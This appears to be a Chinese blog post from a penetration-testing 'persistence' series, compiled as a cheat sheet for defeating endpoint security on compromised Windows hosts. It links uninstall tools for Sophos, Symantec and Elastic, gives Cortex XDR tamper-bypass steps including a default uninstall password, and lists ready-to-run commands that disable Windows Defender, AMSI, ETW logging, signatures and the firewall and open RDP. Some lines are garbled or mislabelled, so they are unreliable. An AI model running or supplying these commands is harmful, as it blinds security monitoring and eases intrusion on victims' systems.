往期文章
WEB渗透权限维持篇-DLL注入\劫持-CSDN博客
WEB渗透权限维持篇-CLR-Injection-CSDN博客
WEB渗透权限维持篇-DLL注入-修改内存中的PE头-CSDN博客
WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)-CSDN博客
WEB渗透权限维持篇-禁用Windows事件日志-CSDN博客
Sophos
https://github.com/ayeskatalas/Sophos-Removal-Tool/
Symantec
https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html
Elastic EDR
https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
cd "C:\Program Files\Elastic\Agent\"
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
Elastic Agent has been uninstalled.
Cortex XDR
https://mrd0x.com/cortex-xdr-analysis-and-bypass/
卸载密码:Password1
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.
禁用Cortex:将DLL改成随机值,然后重启
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
启动时禁用,重启生效
cytool.exe startup disable
禁用对 Cortex XDR 文件、进程、注册表和服务的保护
cytool.exe protect disable
禁用 Cortex XDR(即使启用了篡改保护)
cytool.exe runtime disable
禁用事件收集
cytool.exe event_collection disable
禁用Windows Defender
禁用Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true
排除进程/位置
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\Video, C:\install
禁用扫描所有下载的文件和附件,禁用 AMSI
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
禁用 AMSI (设置为0为启动)
PS C:\> Set-MpPreference -DisableScriptScanning 1
清零 ETW 会话对应的注册表值
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
擦除当前存储的定义
MpCmdRun.exe 的位置:C:\ProgramData\Microsoft\Windows Defender\Platform\
MpCmdRun.exe -RemoveDefinitions -All
删除签名
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
禁用 Windows Defender 安全中心
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
禁用实时保护
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
防火墙
允许进站
如果系统未配置过远程桌面服务,第一次开启时还需要添加防火墙规则,允许3389端口,命令如下:
>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>netsh firewall set portopening TCP 3389 ENABLE
防火墙关闭
>netsh firewall set opmode mode=disable
>netsh advfirewall show allprofiles查看状态
>netsh advfirewall set allprofiles state off
>sc stop windefend
>sc delete windefend
PS> Set-MpPreference -DisableRealtimeMonitoring 1
PS> Set-MpPreference -Disablearchivescanning $true
IP白名单
>New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress 10.10.10.10
列出防火墙的阻止端口
>$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
禁用防火墙
在 Windows 7 上通过 cmd 禁用防火墙
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
在 Windows 7 上通过 Powershell 禁用防火墙
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
通过 cmd 在任何windows上禁用防火墙
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
扫一扫
4457
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
